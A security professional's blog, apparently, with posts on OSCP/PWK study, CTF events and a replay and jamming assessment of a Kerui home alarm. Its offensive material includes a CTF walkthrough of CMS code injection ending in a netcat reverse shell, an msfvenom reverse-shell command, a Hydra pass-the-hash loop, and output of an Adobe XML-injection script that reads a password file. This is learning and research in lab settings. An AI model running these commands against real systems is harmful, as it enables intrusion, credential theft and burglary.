De ontvangstbevestiging van OffSec is in elk geval binnen. Nu begint het wachten!


kilala.nl tags: ,

View or add comments (curr. 0)

OSCP exam: almost done

2017-05-03 06:41:00

4.5 hours left on the clock and I have four hosts fully rooted, the fifth I have a lowpriv shell. With the last one I decided to fsck-it and use the MSF Exploit, to save time :) I could've done it manually, but that would've cost me dear time. 

I didn't get any sleep because I was so strung out on adrenaline :D So after going to bed at 0015, I got up again at 0200. Got my foot in the door with the fifth host, then started writing my final report. Preparation and proper note taking works! In roughly 3.5 hours I have my report fully typed up! 

I can now investigate that last privesc at a leisurely pace :)


kilala.nl tags: ,

View or add comments (curr. 1)

Lab time's up! Only a few days left

2017-04-27 22:19:00

This morning my lab time for the PWK studies expired. I tied a ribbon around the lab report and I'm done! In just a week's time the lab penetration test report grew from 67 pages to 101! In total, I've cracked 18 of the 50+ servers and I'd made good progress on number 19. Not even halfway through the labs, but heck! I've learned SO much! I'm looking forward to Tuesday, even knowing up front that I will not pass. It's gonna be such a great experience! /o/

kilala.nl tags: , ,

View or add comments (curr. 0)

Why even study for OSCP if I can play Hacknet?!

2017-04-19 16:21:00

Way back in the nineties, my brother played Uplink pretty extensively. It was a great game for the time :) Now there's a new, indie hacking game called Hacknet! Seems like a worthy successor!

Ahh yes, running "Scan", "Porthack" and "SSHCrack 22" should suffice in any pen-testing situation! :)


kilala.nl tags: ,

View or add comments (curr. 0)

Almost ready for my first OSCP exam

2017-04-19 14:40:00

Covers of my reports

I sincerely doubt that I'm ready to pass the OSCP exam, but my first attempt is scheduled for May 2nd. My lab time's coming to a close in little over a week and so far I have fully exploited twelve systems and I've learned a tremendous amount of new things. It's been a wonderful experience!

In preparation for the exam, I have finally completed two reports for bonus points:

I've done my best to make the reports fit to my usual standards of documentation, so I'm pretty darn proud of the results! 

Let's see how things go in a week or two. I'll learn a lot during my first exam and after that I'll probably book more lab time. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

I've written my first exploit tool: XML injection in Adobe services leads to file disclosure

2017-04-07 21:35:00

Today I spent a few hours learning how to manually perform the actions that one would otherwise do with Metasploit's "auxiliary:scanner:adobe_xml_inject".

I built a standalone Bash script that uses Curl to submit the XML file to the vulnerable Adobe service(s), so the desired files can be read. Basically, it’s the Bash implementation of Exploit-DB’s multiple/dos/11529.txt (which is a PoC / paper). 

I've submitted this script to Offensive Security and I hope they'll consider adding it to their collection! The script is currently available from my GitHub repository -> adobe_xml_inject.sh

I'm darn happy with how the script turned out! I couldn't have made it this quickly without the valuable experience I've built at $PREVCLIENT, using Curl to work with the Nexpose and PingFederate APIs. 

EDIT: And it's up on Exploit-DB!

Here's a little show of what the script does!

root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -?

        adobe_xml_inject.sh [-?] [-d] [-s] [-b] -h host [-p port] [-f file]

	   -?   Show this help message.
	   -d   Debug mode, outputs more kruft on stdout.
	   -s   Use SSL / HTTPS, instead of HTTP.
	   -b	Break on the first valid answer found.
	   -h	Target host
	   -p	Target port, defaults to 8400.
	   -f	Full path to file to grab, defaults to /etc/passwd.

	This script exploits a known vulnerability in a set of Adobe applications. Using one 
	of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is
	normally inaccessible. 

	NOTE: Windows paths use \, so be sure to properly escape them when using -f! For example:
	adobe_xml_inject.sh -h 192.168.1.20 -f c:\\coldfusion8\\lib\\password.properties
	adobe_xml_inject.sh -h 192.168.1.20 -f 'c:\coldfusion8\lib\password.properties'

	This script relies on CURL, so please have it in your PATH. 


root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -h 192.168.10.23 -p 80 -f 'c:\coldfusion8\lib\password.properties'
INFO 200 for http://192.168.10.23:80/flex2gateway/
INFO 200 for http://192.168.10.23:80/flex2gateway/http
Read from http://192.168.10.23:80/flex2gateway/http:
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl"><string>;jsessionid=f030d168c640a7d02d4036a3d3b7e4c35783</string></header>
<body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits>
<string>timestamp</string><string>headers</string><string>body</string>
<string>correlationId</string><string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string></traits>
<double>1.491574892476E12</double><object><traits><string>DSId</string>
</traits><string>DCB6C381-FC19-7475-FC8F-9620278E2A14</string></object><null/>
<string>#Fri Sep 23 18:27:15 PDT 2011
rdspassword=< redacted >
password=< redacted >
encrypted=true
</string><string>DCB6C381-FC3E-1604-E33B-88C663AAA33F</string>
<double>0.0</double><string>DCB6C381-FC2E-68D8-986E-BD28CQEDABD7</string>
<null/></object></body></amfx>"200"
INFO 500 for http://192.168.10.23:80/flex2gateway/httpsecure
INFO 200 for http://192.168.10.23:80/flex2gateway/cfamfpolling
INFO 500 for http://192.168.10.23:80/flex2gateway/amf
INFO 500 for http://192.168.10.23:80/flex2gateway/amfpolling
INFO 404 for http://192.168.10.23:80/messagebroker/http
INFO 404 for http://192.168.10.23:80/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/http
INFO 404 for http://192.168.10.23:80/blazeds/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/samples/messagebroker/http
INFO 404 for http://192.168.10.23:80/samples/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/lcds/messagebroker/http
INFO 404 for http://192.168.10.23:80/lcds/messagebroker/httpsecure
INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/http
INFO 404 for http://192.168.10.23:80/lcds-samples/messagebroker/httpsecure

kilala.nl tags: , , ,

View or add comments (curr. 0)

A wonderful day at CTF036 2017

2017-03-31 22:40:00

Presenting at CTF036 about RF hacking

Today was a blast! In what has become an annual tradition, Ultimum organised the third edition of their CTF036 event

A big change since last year: I started the day not by listening, but by talking! I presented the "My first RH hack" talk, which I'd given last year at IT Gilde. In it, I outlined what I'd learned hacking the Kerui alarm system. The slides to my presentation can be found here. Reactions from the attendants were generally positive: apparently my presentation style was well-received and I'd matched the content's level to that of the crowd. 

I was followed by John Kroon, who detailed a vulnerability assessment framework he'd built and Sijmen Ruwhof. The latter has recently gained some fame with his public outcry regarding the Dutch voting process and the software involved. It's quite the kerfuffle!

The CTF was quite a challenge! Like last year we were presented with an A4 sized description of the target, which basically hinted at a domainname, a mail server and a DNS server. After some initial confusion about IP ranges, I got off to a start. DNSenum confirmed three hosts in one network, with two others in a deeper subnet. The three servers out in the open are respectively a web server, the mail server and a Windows host with data shares. 

Like last year, I started with the web server. This runs CMS-Made-Simple v1.1.2. Sploitsearch did not list anything that seemed immediately useful, but Nikto did show me that various useful subdirs were found, including /admin and /install. John's colleague Jordy quickly found something interesting, which relies upon /install not being deleted: CMS-MS PHP Code Injection vulnerability

By this time a few competitors had discovered something I'd missed: the Windows box had a freely accessible share with three of the sought-after accounts, worth 30 points. Of the twenty-odd competitors, three had 30 points within the first hour. 

John and I continued poking at Jordy's suggestion, with Rik across the tables following suit. I was the first to get it to work, after Jordy spurred me on. The basic process was indeed as outlined in the linked article:

  1. Setup MySQL on my own sytem.
  2. Make a random, empty database and grant a new account (e.g. "test") full access to the database. 
  3. The password to the user account must be: '.passthru($_GET['command']);exit;//
  4. The database must be accessible remotely (change mysql.cnf and use the appropriate GRANT, more info here).
  5. At this point you use the setup tool in /install to point CMS-MS at your own database. Uncheck the boxes in step #4. 
  6. Once you've finished the setup tool, the config.php file contains the password above, which enables you to call the base URL with an added "?command=" where you can enter any arbitrary command for the host OS. 
  7. I quickly found that the target host had /bin/netcat installed, so I could run http://www.thesmartcloud.nl/?command=/bin/netcat -e /bin/bash 172.100.23.74 443
  8. This connects to my listening netcat on my port 443. Ace!

Netcat gave me a shell as user "www-data". Poking around the host I found no abusable SUID executables, no sudo rules and no obvious methods for privesc. I did manage to grab /home/accounts.txt which contains seven accounts. Thus, for about half an hour, I was in the gleeful position of being 1st with 70 points :D 

While I kept poking at the web server and later moved on to the RoundCube/Dovecot box, I also helped John and Rik while they tried to get the CMS-MS exploit to work. Word got around quickly and a few of the guys who already had 30pts moved up to 100, with about 40mins left. I tried hard, but I couldn't find a way to score more points, so I ended up in 5th place today. 

Ultimum's Michael informed us that the maximum score attainable was 500pts, so basically none of us had scratched beyond the surface by 16:00. As I said: they made it quite the challenge! It was a lot of fun!


kilala.nl tags: , ,

View or add comments (curr. 0)

More attention for bad security of home alarms

2017-03-31 19:49:00

Cover of the April CT magazine

You may recall my pen-test / security review of the Kerui alarm system, where I found that a replay attack is tremendously easy

Turns out that more people are catching on! One of the audience members at my presentation today informed me that the April issue of C'T Magazine has a cover story about this exact topic: unsafe home alarm systems. Awesome! Can't wait to read it!


kilala.nl tags: ,

View or add comments (curr. 0)

Linux in the way-way back machine!

2017-03-27 09:01:00

InfoMagic Linux box from the nineties

RedHat just posted a wonderful article to LinkedIn, that filled me with nostalgia: Test-drive Linux from 1993-2001.

My first experience with Linux was at the Hogeschool Utrecht, in Jaap's class on modern-day operating systems and networks. I've long forgotten his surname, but Jaap was always very enthusiastic about Linux and about what open source might mean for our future. In the labs, we set up Linux boxen and hooked up modems so we could make our own dial-in lines to school. None of us really knew what we were doing, just dicking around and learning as we went. It was a great experience! :)

I wanted to keep on working with Linux outside of our labs, so I hopped down to *) in Utrecht. I've forgotten what they were called at the time... Was it Donner? I dunno, we always called them "sterretje-hekje" (star-brace) for their logo. They were the largest bookstore in the center of Utrecht, and their basement was dedicated to academics. Among their endless stacks of IT books I found my treasured New Hackers Dictionary (the Jargon file) and the famed InfoMagic Linux Developer's Resource CD-ROM boxset (pictured left). 

Trying the various CDs, I settled on RedHat 5.0 which ran pretty nicely on my Compaq Pressario AIO. Mmmm, 450MB hard drive, 4x CD-ROM and 16MB of RAM! ;) 

Right before graduating from HU, one of the lab technicians gifted me a Televideo 950 dumb terminal. We'd used those in the OS-9 labs, while we learned assembly on the MC68000. I don't recall what hardware we used there... It was two students to a nondescript aluminum box, wired through token ring to a bright orange OS-9 server. I still wonder what server was!

Wow... Hard to believe it's already been eighteen years!


kilala.nl tags: , ,

View or add comments (curr. 2)

CISSP certs now come with a spiffy giftbox

2017-03-01 17:10:00

When I renewed my CISSP status a few weeks ago, I knew I'd be getting a new membership card in the mail. What I didn't expect however, was to get a swanky giftbox with a nice presentation of the cert, card and a pin! Looking classy there, ISC2 :)


kilala.nl tags: ,

View or add comments (curr. 0)

Quick connection checks in Bash

2017-02-24 16:27:00

I can't believe it took me at least four years to learn about Bash's built-in Netcat equivalent /dev/tcp. And I really can't believe it took me even longer than that to learn about Bash's timeout command!

Today I'm attempting pass-the-hash attacks on the SMB hosts in the PWK labs. After trying a few different approaches, I've settled on using Hydra to test the hashes. The downside is that Hydra can sometimes get stuck in these "child terminated, cannot connect" loops when the SMB target can't be reached. To prevent that, I'm testing the connection with Bash's /dev/tcp, which has the downside that it may also get stuck in long waiting periods if the target isn't responding correctly. Enter timeout, stage left!

for IP in $(cat smb-hosts.txt | cut -f2)
do 
	timeout 10 bash -c "echo > /dev/tcp/${IP}/445"
	[[ $? -gt 0 ]] && continue

	cat hashdump2.txt | tr ':' ' ' | while read USER IDNUM HSH1 HSH2
	do 
	  echo "============================"
	  echo "Testing ${USER} at ${IP}"
	  hydra -l ${USER} -p ${HSH1}:${HSH2} ${IP} -m "LocalHash" smb -w 5 -t 1
	done
done

kilala.nl tags: , ,

View or add comments (curr. 0)

Learning more about and thanks to buffer overflows

2017-02-04 09:20:00

I'm very happy that the PWK coursebook includes no less than three prepared buffer overflow exercises to play with. The first literally takes you by the hand and leads you through building the buffer overflow attack step by step. The second (exercise 7.8.1) gives you a Windows daemon to attack and basically tells you "Right! Now do what you just did once more, but without help!" and the third falls kind of in-between while attacking a Linux daemon. Exercise 7.8.1 (vulnserver.exe) is the last one I tackled as it required lab access.

By this time I felt I had an okay grasp of the basics and I had quickly ascertained the limits within which I would have to complete my work. Things ended up taking a lot more time though, because I have a shaky understanding of the output sizing displayed by MSFVenom. For example:

root@kali:# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.177 LPORT=443 -b "\x00" -f c
...
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes

I kept looking at the "final size" line, expecting that to be the amount that I needed to pack away inside the buffer. That led me down a rabbit hole of searching for the smallest possible payload (e.g. "cmd/windows/adduser") and trying to use that. Turns out that I should not look at the "final size" line, but simply at the "payload size" value. Man, 7.8.1 is so much easier now! Because yes, just about any decent payload does fit inside the buffer part before the EIP value. 

That just leaves you with the task of grabbing a pointer towards the start of the buffer. ESP is often used, but at the point of the exploit it points towards the end of the buffer. Not a problem though, right? Just throw a little math at it! Using "nasm_shell" I found the biggest subtraction (hint: it's not 1000 like in the image) I could make without introducing NULL characters into the buffer and just combined a bunch of'm to throw ESP backwards. After that, things work just fine. 

Learning points that I should look into:


kilala.nl tags: , , ,

View or add comments (curr. 0)

PWK Labs lead times? Not today!

2017-01-27 12:28:00

Having finished 90% of my PWK exercises, it's time to get into the online labs! The final 10% of the exercises need lab access and I need a Windows VM with valid SLMail license. The OffSec website warns that usually there's a two to three week lead time on your lab access requests. Well apparently not today! I received an email at 12:27 that my lab access will start at 13:30 today. Ace!


kilala.nl tags: , ,

View or add comments (curr. 0)

OSCP and PWK studies: progress

2017-01-24 21:16:00

It's been a few weeks since I took the PWK (Pentesting With Kali Linux) course at TSTC in Veenendaal. After a short break, I've gone over the whole course book a second time. On the one hand to keep the materials fresh in my head, but also to go over all of the exercises a second time. By making a proper report of all the exercises, it's possible to qualify for 5 bonus points on the OSCP exam. On a minimum score of 70 points, that's a pretty big deal!

I'm currently busting my head on chapter 8, on Linux buffer overflows, which wasn't handled in class. I'm fine on the general concepts and execution, but I'm running afoul a conflict between the 64-bit EDB debugger and the 32-bit application used as an example. Things aren't playing 100% nice, with an unexpected segfault currently getting in my way. 

After this, it's time to start my lab time. I've finished all the coursework as far as possible without using the labs, but now that can't be postponed anymore. 


kilala.nl tags: ,

View or add comments (curr. 0)

Getting with the times: website renovation

2017-01-19 22:18:00

It's been roughly eight years since I started work on KilalaCMS, the code that runs this website. She's served me well and I haven't had many headaches. Early on, Dick offered me lots of great help in sanitizing input, putting up at least some SQL injection protection. In the end it might not be much to look at, but she's mine :)

A few months back Dreamhost sent their customers who were still on PHP5.5 a warning that said version would soon be dropped from their servers. Thus, it was a warning to go check your code. Obviously KilalaCMS was behind the times, so I've now taken some time to adjust things here and there so it works in PHP7.0. I've also taken the liberty to default everything to HTTPS, using a free SSL cert from Lets Encrypt. Dreamhost took care of the latter part for me. Good service!

I may run into a bug or two, but so far things are looking good!

EDIT: Kudos by the way to Dreamhost for their tech support! As part of the reno, I'd decided to run an "sqlmap" test against my DEV site, to make sure I wasn't leaving SQLI in plain sight. After the first tentative probe, the server slammed the door on my nose! They've got their boxes set up quite nicely, to prevent attacks like these. Nice! Had a chat with their support people and we worked out a nice way for me to test, without affecting my site or any of the other folks hosted on my box. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Offensive Security PWK - CTF

2016-12-16 12:37:00

Faraday Security pentest

So far I'm loving OffSec's live classroom PWK course (Pen-Testing with Kali Linux), mostly because it actually requires quite some effort while your there. No slouching in your seats, but axe-to-the-grindwheel hands-on work. But last night was a toughy! As part of the five day course, the Thursday evening offers an additional CTF where all students can take part in attacking a simulated company. 

The initial setup is quite similar to the events which I'd experience at Ultimum and at KPMG: the contestants were divided into teams and were given VPN login details. In this case, the VPN connection led us straight into the target company's DMZ, of which we were given a basic sketch. A handful of servers were shown, as well as a number of routers/firewalls leading into SCADA and backoffice networks. As usual, the challenge was to own as many systems as possible and to delve as deeply into the network as you could. 

Let me tell you, practicing coursework is something completely different from trying the real deal. Here we are, with 32 hours of practice under our belt and all of a sudden we're spoilt for choice. Two dozen target hosts with all manner of OSes and software. In the end my team concluded that it was so much that it'd left our heads spinning and that we should have focused on a small number of targets instead of going wide. 

Our initial approach was very nice: get together as a group, quickly introduce eachother and then form pairs. With a team of 8-10 people, working individually leads to a huge mess. Working in pairs, not only would we have two brains on one problem, but that would also leave more room for open communication. We spent the first 45 minutes on getting our VPN connections working and on recon, each pair using a different strategy. All results were the poured into Faraday on my laptop, whose dashboard was accessible to our team mates through the browser. I've been using Faraday pretty extensively during the PWK course and I'm seriously considering using it on future assignments!

After three grueling hours our team came in second, having owned only one box and having scored minor flags on other hosts. I'm grateful that the OffSec team went over a few of the targets today, taking about 30min each to discuss the approach needed to tackle each host. Very educational and the approaches were all across the board :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Continued RF hacking of a home alarm system

2016-10-21 10:57:00

Continuing where I left off last time (replay attack using a remote), I wanted to see how easy it would be to mess with the sensors attached to the Kerui home alarm system that I'm assessing. 

For starters, I assumed that each sensor would use the same HS1527 with a different set of data sent for various states. At least in the case of the magnet sensors, that assumption was correct. The bitstreams generated by one of the contacts are as follows:

As I proved last time, replaying any of these codes is trivial using an Arduino or similar equipment. Possible use cases for miscreants could include:

  1. Trick the alarm into thinking an open door is closed, before the alarm gets armed. That way the home owner does not get alerted about leaving something open when leaving the home. 
  2. Trick the alarm into thinking a window opened, after the alarm gets armed. Do this often enough, a few nights a week, and the home owner will get fed up with the alarm and just disable it. 

Going one step further I was wondering whether the simple 433Mhz transmitter for my Arduino would be capable of drowning out the professionally made magnet contacts. By using Suat Özgür's RC-Switch library again, I set the transmitter to continuously transmit a stream of ones. Basically, just shouting "AAAAAAAAAHHHHH!!!!!" down the 433MHz band.

Works like a charm, as you can see in the video below. Without the transmitter going, the panel hears the magnet contact just fine. Turning on the transmitter drowns out any of the signals sent by the contact.


kilala.nl tags: , ,

View or add comments (curr. 0)

First steps in hardware hacking

2016-10-05 08:23:00

Having come a long way in the RF-part of my current security project, I decided to dive into the hardware part of my research. The past few weeks have been spent with a loupe, my trusty multimeter, a soldering iron and some interesting hardware!

Cracking the shell of the Kerui G19 shows a pretty nice PCB! All ICs and components are on the backside, the front being dedicated to the buttons and the business end of the LCD panel. Opening the lid on the back immediately shows what look like unterminated service pins (two sets of'm), which is promising. 

What's less promising, is that the main IC is completely unmarked. That makes identifying the processor very hard, until I can take a crack at the actual firmware. My initial guess was that it's some ARM7 derivative, because the central panel mostly acts like a dressed-down feature phone with Android. A few weeks later that guess feels very, very off and it's most likely something much simpler. As user PedroDaGr8 mentioned on my Reddit thread about the PCB:

"Most people would assume an ARM in this case. In reality, it might be ARM, PIC, AVR, MIPS, FPGA, CPLD, H78, etc. Any of these could fulfill this role and function. It often depends on what the programmer or programming team is familiar with. I have seen some designs from China before, that used a WAY OVERKILL Analog Devices Blackfin DSP processor as the core. Why? Because it was cheaper to use the guys they had that were proficient at programming in Blackfin than to hire new guys for this one product."

So until I can analyse the firmware, the CPU could be just about anything! :D

There are many great guides online, on the basics of hardware hacking, like DevTTYs0's "Reverse engineering serial ports" or Black Hills Security's "We can hardware hack, and you can too!". Feeling confident in their teachings I took to those service pins with my multimeter. Sadly, both rows of pins had an amount of pins that's not consistent with UART consoles but I didn't let that discourage me. Based on the measured voltages I hooked up my PL2303 UART-to-USB, to see if I could find anything useful. 

No dice. Multiple pins provided output onto my Picocom console, often with interspersed Chinese unicode characters. But no pins would react to input and the output didn't look anything like a running OS or logging. 

Between the lack of identification on the CPU and the lack of clear UART ports, it was time for hard work! I took a page from the book of Joffrey Czarny & Raphaël Rigo ("Reverse engineering hardware for software reversers", slide 11) and started mapping out all the components and traces on the PCB. Instead of using their "hobo method" with GIMP, I one-upped things by using the vector editor InkScape. My first few hours of work resulted in what you see above: a mapping of both sides of the PCB and the interconnections of most of the pins. 

Thus I learned a few things:

  1. Damn! There's at least one hidden layer of traces on the inside of the PCB. I have deduced the existence of a number of connections that cannot be visually confirmed, only by measuring resistance. 
  2. The service headers under the backside lid are connected to both the CPU (CN11 and CN3) with CN3 probably having served to flash the firmware into the EN25-F80 EEPROM.

Status for now: lots of rewarding work and I have a great SVG to show for it. And I've gotten to know my Arduino and PL2303 a bit better. But I haven't found anything that helps me identify an OS or a console port yet. I'll keep at it!!


kilala.nl tags: , ,

View or add comments (curr. 2)

First steps in RF hacking

2016-09-20 18:05:00

The first part of my current project that I wanted to tackle, was the "RF hacking" part: capturing, analyzing, modifying and replaying the radio signals sent and received by a hardware device.

Home alarm systems (or home automation systems in general) often used one of two RF bands: 433MHz or 868Mhz. As far as I understand it, 433MHz is often used by lower end or cheaper systems; haven't figured out why just yet. In the case of the Kerui G19 alarm, the adverts from the get-go tell you it uses 433MHz for its communications.

Cracking open one of the remotes I find one basic IC in there, the HS1527 (datasheet). The datasheet calls it an "OTP encoder", but I haven't figured out what OTP stands for in this case. I know "OTP" as "One Time Password" and that's also what the datasheet hints at ("HS1527 hai a maximum of 20 bits providing up to 1 million codes.It can reduce any code collision and unauthorized code scanning possibilities.") but can't be that because the Kerui remotes send out the exact same code every time. HKVStar.com has a short discussion on the HS1527, calling it a "learning code" as opposed to a "fixed code" (e.g. PT2262), but the only difference I see is 'security through obscurity', because it simply provides a large address space. There is no OTP going on here!

The datasheet does provide useful information on how its bit patterns are generated and what they look like on the output. The four buttons on the remote are tied 1:1 to the K0 through K3 inputs, so even if HS1527 can generate 16 unique codes, the remote will only make four unless you're really fast. 

After that I spent a lot of time reading various resources on RF sniffing and on 433MHz communications. Stuff like LeetUpload's articles, this article on Random Nerd, and of course lots of information at Great Scott Gadgets. Based on my reading, I put together a nice shopping list:

And cue more learning! 

GQRX turns out to be quite user-friendly and while hard to master, isn't too hard to get a start with. It's even included with the Kali Linux distribution! Using GQRX I quickly confirmed that the remotes and control panel do indeed communicate around the 433MHz band, with the panel being at a slighly higher frequency than the remotes. With some tweaking and poking, I found the remote to use AM modulation without resorting to any odd trickery.

GQRX dilligently gave me a WAV file that can be easily inspected in Audacity. Inspecting the WAV files indicated that each button-press on the remote would send out multiple repeats of the same bitstream. Zooming into the individual bitstreams you can make out the various patterns in the signal, but I'd had problem matching it to the HS1527 datasheet for the longest of times. For starters, I never saw a preamble, I counted 25 bits instead of 20+4 (address+data) and the last 4 bits showed patterns that should only occur when >1 button was pressed. 

Then it hit me: that 25th bit is the preamble! The preamble is sent back-to-back with the preceding bitstream. Doh!

Just by looking at the GQRX capture in Audacity, I can tell that the address of this particular remote is 10000100001100110001 and that 0010 is the data used for the "disarm" signal. 

Time for the next part of this experiment; let's break out the Arduino! Again, the Arduino IDE turns out to be part of the Kali Linux distro! Awesome! Some Googling led me to Suat Özgür's RC-Switch library, which comes with a set of exemplary programs that work out-of-the-box with the 433Mhz transceivers I bought. 

Using the receiver and sniffing the "disarm" signal confirms my earlier findings:

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 9228,864,320,272,916,268,920,272,912,276,908,872,308,284,904,280,904,280,912,276,904,872,320,868,312,280,908,276,912,868,312,876,324,276,900,276,908,280,908,876,312,280,908,280,904,880,312,276,908,

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 14424,76,316,280,904,288,896,280,904,20,1432,36,1104,36,912,280,904,284,900,280,908,876,312,872,308,280,908,88,272,120,928,128,756,24,224,20,572,44,1012,32,800,24,188,32,964,68,1008,44,856,

The bitstream matches what I saw in Audacity. Using Suat's online parsing tool renders an image very similar to what we saw before.

So, what happens if we plug that same bitstream into the basic transmission program from RC-Switch? Let me show you!

If the YouTube clip doesn't show up: I press the "arm" button on the alarm system, while the Arduino in the backgrouns is sending out two "disarm" signals every 20 seconds. 

To sum it up: the Kerui G19 alarm system is 100% vulnerable to very simple replay attacks. If I were to install this system in my home, then I would never use the remote controls and I would de-register any remote that's tied to the system. 


kilala.nl tags: , ,

View or add comments (curr. 0)

New project: security assessment of a home security system

2016-08-24 20:58:00

(C) Kerui Secrui

Recently I've been seeing more and more adverts pop up for "cheap" and user-friendly home alarm systems from China. Obviously you're going to find them on Alibaba and MiniInTheBox, but western companies are also offering these systems and sometimes at elevated prices and with their own re-branding. Most of these systems are advertised as a set of a central panel, with GSM or Wifi connection, a set of sensors and a handful of remotes.

Between the apparent popularity of these systems and my own interest in further securing our home, I've been wanting to perform a security assessment of one of these Chinese home security systems. After suggesting the project to my employer, Unixerius happily footed the bill on such a kit, plus a whole bunch of extra lovely hardware to aid in the testing! 

For my first round of testing, I grabbed a Kerui G19 set from AliExpres

I'm tackling this assessment as a learning experience as I have no prior experience in most of the areas that I'll be attacking. I plan of having a go at the following:

The last item on the list is the only one I'm actually familiar with. The rest? Well, I'm looking forward to the challenge!

Has research like this been done before? Absolutely, I'm being far from original! One great read was Bored Hacker's "How we broke into your home". But I don't mind, as it's a great experience for me :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed my CEH and took part in a CTF

2016-07-05 20:10:00

Today was a day well spent!

This morning I passed my CEH examination in under 45 minutes. Bam-bam-bam, answers hammered out with time to spare for coffee on my way to Amstelveen. A few weeks back I'd started this course expecting some level of technical depth, but in the end I've concluded that CEH makes a nice entry-level course for managers or juniors in IT. One of my colleagues in the SOC had already warned me about that ;) I still had lots of fun with my fellow IT Gilde members, playing around during the evening-time classes set up in cooperation with TSTC.

Why go to Amstelveen? Because it's home to KPMG's beautiful offices, which is where I would take part in a CTF event co-organized by CQure! This special event served as a trial-run for a new service that KPMG will be offering to companies: CTF as a training event. Roughly twenty visitors were split across four teams, each tackling the same challenge in a dedicated VM environment. My team consisted mostly of pen-testing newbies, but we managed to make nice headway by working together and by coordinating our efforts through a whiteboard. 

This CTF was a traditional one, where the players are assumed to be attacking a company's infrastructure. All contestants were given VPN configuration data, in order to connect into the gaming environment. KPMG took things very seriously and had set up separate environments for each team, so we could have free reign over our targets. The introductory brief provided some details about the target, with regards to their web address and the specific data we were to retrieve. 

As I mentioned, our room was pretty distinct insofar that we were 90% newbies. Thus our efforts mostly consisted of reconnaissance and identifying methods of ingress. I won't go into details of the scenario, as KPMG intends to (re)use this scenario for other teams, but I can tell you that they're pretty nicely put together. They include scripts or bots that simulate end-user behaviour, with regards to email and browser usage. 

CQure and KPMG have already announced their follow-up to this year's CTF, which will be held in April of 2017. They've left me with a great impression and I'd love to take part in their next event!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Games I love(d): Stardew Valley

2016-05-01 09:22:00

A screenshot from The Mirror

While I might play games often, I don't play a multitude of games. I like sinking quite some time into games that are really good, instead of jumping to and fro. I often get suggestions for good games from the likes of Penny Arcade or other gaming blogs/comics. Case in point: I found out about 2015's indy hit Stardew Valley

I've never played Harvest Moon games, despite knowing they're pretty darn good. I've been wanting to get into it, but never did. Imagine my joy when I learned about Stardew Valley, the bastard lovechild of Harvest Moon, Animal Crossing and modern-day indy game and modding mentality. I'll let some reviews do the explaining: Ars Technica and PC Gamer.

Why do I love it so much? Mostly because:

It's hard to believe that all of it was made by a single person! Sure it took him four years, but still!


kilala.nl tags: ,

View or add comments (curr. 0)

Building the BoKS Puppet module

2016-04-20 20:35:00

Yesterday I published the BoKS Puppet module on Puppet Forge! So far I've sunk sixty hours into making a functional PoC, which installs and configures a properly running BoKS client. I would like to thank Mark Lambiase for offering me the chance to work on this project as a research consultant for FoxT. I'd also like to thank Ger Apeldoorn for his coaching and Ken Deschene for sparring with me. 

BoKS Puppet module at the Forge.

In case anyone is curious about my own build process for the Puppet module, I've kept a detailed journal over the past few months which has now been published as a paper on our website -> Building the BoKS Puppet module.pdf

I'm very curious about your thoughts on it all. I reckon it'll make clear that I went into this project with only limited experience, learning as I went :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A very productive week: BoKS, Puppet and security

2016-04-17 00:28:00

I have had a wonderfully productive week! Next to my daily gig at $CLIENT, I have rebuilt my burner laptop with Kali 2016 (after the recent CTF event) and I have put eight hours into the BoKS Puppet module I'm building for Fox Technologies.  

The latter has been a great learning experience, building on the training that Ger Apeldoorn gave me last year. I've had a few successes this week, by migrating the module to Hiera and by resolving a concurrency issue I was having.

With regards to running Kali 2016 on the Lenovo s21e? I've learned that the ISO for Kali 2016 does not include the old installer application in the live environment. Thus it was impossible to boot from a USB live environment to install Kali on /dev/mmcblk1pX. Instead, I opted to reinstall Kali 2, after which I performed an "apt-get dist-upgrade" to upgrade to Kali 2016. Worked very well once I put that puzzle together.


kilala.nl tags: , ,

View or add comments (curr. 0)

CTF036 security event in Almere

2016-04-01 19:01:00

My notes from CTF036

A few weeks ago Almere-local consulting firm Ultimum posted on LinkedIn about their upcoming capture the flag event CTF036. Having had my first taste of CTF at last fall's PvIB event, I was eager to jump in again! 

The morning's three lectures were awesome!

The afternoon's CTF provided the following case (summarized): "De Kiespijn Praktijk is a healthcare provider whom you are hired to attack. Your goal is to grab as many of their medical record identifiers as you can. Based on an email that you intercepted you know that they have 5 externally hosted servers, 2 of which are accessible through the Internet. They also have wifi at their offices, with Windows PCs." The maximum score would be achieved by grabbing 24 records, for 240 points. 

I didn't have any illusions of scoring any points at all, because I still don't have any PenTesting experience. For starters, I decided to start reconnaissance through two paths: the Internet and the wifi. 

As you can see from my notes it was easy to find the DKP-WIFI-D (as I was on the D-block) MAC address, for use with Reaver to crack the wifi password. Unfortunately my burner laptop lacks both the processing power and a properly sniffing wlan adapter, so I couldn't get in that way. 

I was luckier going at their servers:

  1. Sanne's home directory, which actually contained a text file with "important patients". BAM! Three medical records!!
  2. The /etc/shadow file had an easily crackable password for user Henk. Unfortunately that username+password did not let me access the .15 server through SSH or Webmin.
  3. Sanne has a mailbox! In /home/vmail I found her mailbox and it was receiving email! I used the Drupal site's password recovery to access her Drupal account. 

